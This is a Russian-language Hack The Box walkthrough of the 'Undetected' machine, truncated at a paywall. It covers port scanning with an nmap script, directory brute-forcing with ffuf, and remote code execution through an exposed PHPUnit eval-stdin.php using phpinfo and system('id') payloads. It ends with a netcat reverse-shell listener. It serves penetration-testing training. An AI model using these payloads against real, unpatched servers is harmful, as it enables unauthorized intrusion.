• Партнер

  • В этом рай­тапе я покажу про­хож­дение сред­ней по слож­ности машины с пло­щад­ки Hack The Box под наз­вани­ем Undetected. Ее фиш­ка в том, что мы прой­дем путь по чужим бэк­дорам: от веба до получе­ния дос­тупа и SSHD для повыше­ния при­виле­гий.

    warning

    Под­клю­чать­ся к машинам с HTB рекомен­дует­ся толь­ко через VPN. Не делай это­го с компь­юте­ров, где есть важ­ные для тебя дан­ные, так как ты ока­жешь­ся в общей сети с дру­гими учас­тни­ками.

     

    Разведка

     

    Сканирование портов

    До­бав­ляем IP-адрес машины в /etc/hosts:

    10.10.11.146    undetected.htb

    И запус­каем ска­ниро­вание пор­тов.

    Справка: сканирование портов

    Ска­ниро­вание пор­тов — стан­дар­тный пер­вый шаг при любой ата­ке. Он поз­воля­ет ата­кующе­му узнать, какие служ­бы на хос­те при­нима­ют соеди­нение. На осно­ве этой информа­ции выбира­ется сле­дующий шаг к получе­нию точ­ки вхо­да.

    На­ибо­лее извес­тный инс­тру­мент для ска­ниро­вания — это Nmap. Улуч­шить резуль­таты его работы ты можешь при помощи сле­дующе­го скрип­та.

    #!/bin/bash
    ports=$(nmap -p- --min-rate=500 $1 | grep ^[0-9] | cut -d '/' -f 1 | tr '\n' ',' | sed s/,$//)
    nmap -p$ports -A $1

    Он дей­ству­ет в два эта­па. На пер­вом про­изво­дит­ся обыч­ное быс­трое ска­ниро­вание, на вто­ром — более тща­тель­ное ска­ниро­вание, с исполь­зовани­ем име­ющих­ся скрип­тов (опция -A).

    Результат работы скрипта
    Ре­зуль­тат работы скрип­та

    Мы находим три откры­тых пор­та:

    • 22 — служ­ба OpenSSH 8.2;
    • 80 — веб‑сер­вер Apache 2.4.41;
    • 8000 — веб‑сер­вер Python 3.8.10;

    Вы­бор не очень широкий, из все­го пред­став­ленно­го оста­ется работать толь­ко с веб‑сер­вером на 80 пор­ту.

    Главная страница сайта
    Глав­ная стра­ница сай­та

    При тес­тирова­нии веб‑при­ложе­ний я рекомен­дую выпол­нять абсо­лют­но всю работу через Burp Proxy. Это помог­ло най­ти ссыл­ку, ведущую на дру­гой домен (а не на тот, что мы при­дума­ли).

    Исходный код главной страницы
    Ис­ходный код глав­ной стра­ницы

    До­бав­ляем его в файл /etc/hosts и прос­матри­ваем.

    10.10.11.146 undetected.htb store.djewelry.htb
    Главная страница store.djewelry.htb
    Глав­ная стра­ница store.djewelry.htb

    Это тот же сайт, толь­ко появи­лось новое меню, в котором есть кор­зина и кноп­ка для авто­риза­ции.

     

    Точка входа

    Боль­ше ничего инте­рес­ного най­ти на сай­те не уда­лось, поэто­му поп­робу­ем переб­рать катало­ги при помощи fuff.

    Справка: сканирование веба c fuff

    Од­но из пер­вых дей­ствий при тес­тирова­нии безопас­ности веб‑при­ложе­ния — это ска­ниро­вание методом перебо­ра катало­гов с целью поис­ка скры­той информа­ции и недос­тупной обыч­ным посети­телям фун­кций. Для это­го мож­но исполь­зовать прог­раммы вро­де dirsearch и dirb.

    Я пред­почитаю лег­кий и очень быс­трый ffuf. При запус­ке исполь­зуем сле­дующие парамет­ры:

    • -w — сло­варь (я исполь­зую сло­вари из набора Seclists);
    • -t — количес­тво потоков;
    • -u — URL;
    • -fc — исклю­чить из резуль­тата отве­ты с кодом 403.

    По­луча­ется сле­дующая коман­да:

    ffuf -u http://store.djewelry.htb/FUZZ -t 256 -w directory_2.3_medium_lowercase.txt
    Результат сканирования каталогов с помощью ffuf
    Ре­зуль­тат ска­ниро­вания катало­гов с помощью ffuf

    На­ходим нес­коль­ко катало­гов, из которых реаль­ный инте­рес пред­став­ляет все­го один — /vendor. Фай­ла index.html в нем нет, поэто­му Apache показы­вает нам содер­жимое.

    Содержимое каталога /vendor
    Со­дер­жимое катало­га /vendor

    Сра­зу видим, какие прог­раммы исполь­зуют­ся. Мож­но заг­лядывать внутрь папок. Прой­дясь по ним, мы узна­ем и номера вер­сий. Все это силь­но облегчит нам поиск уяз­вимос­тей. Так, судя по фай­лам ChangeLog, здесь уста­нов­лен фрей­мворк PHPUnit вер­сии 5.6.

    Содержимое каталога /vendor/phpunit/phpunit
    Со­дер­жимое катало­га /vendor/phpunit/phpunit

    При помощи Google лег­ко находим не толь­ко извес­тную уяз­вимость в ней, но и метод экс­плу­ата­ции.

    Поиск эксплоитов в Google
    По­иск экс­пло­итов в Google
     

    Точка опоры

    Файл Util/PHP/eval-stdin.php до вер­сии 5.6.3 поз­воля­ет выпол­нять про­изволь­ный код на PHP через передан­ные POST-зап­росом дан­ные, начина­ющиеся с подс­тро­ки <?. Это про­исхо­дит из‑за сле­дующе­го кода.

    eval('?>'.file_get_contents('php://input'));

    Поп­робу­ем отпра­вить тес­товую наг­рузку из PoC:

    <?=phpinfo();?>
    Проверка уязвимости
    Про­вер­ка уяз­вимос­ти

    Зап­рос был обра­ботан и выпол­нен! Поп­робу­ем выпол­нить коман­ду id в коман­дной обо­лоч­ке.

    <?php system("id"); ?>
    Выполнение команды id
    Вы­пол­нение коман­ды id

    Ко­ман­да успешно выпол­нена — естес­твен­но, проб­расыва­ем реверс‑шелл. Для начала откро­ем лис­тенер (у меня порт 4321) коман­дой rlwrap -cAr nc -lvp 4321. Затем нам нуж­но закоди­ровать реверс шелл в Base64:

    Продолжение доступно только участникам

    Материалы из последних выпусков становятся доступны по отдельности только через два месяца после публикации. Чтобы продолжить чтение, необходимо стать участником сообщества «Xakep.ru».

    Присоединяйся к сообществу «Xakep.ru»!

    Членство в сообществе в течение указанного срока откроет тебе доступ ко ВСЕМ материалам «Хакера», позволит скачивать выпуски в PDF, отключит рекламу на сайте и увеличит личную накопительную скидку! Подробнее

    Подписаться
    Уведомить о
    0 комментариев
    Межтекстовые Отзывы
    Посмотреть все комментарии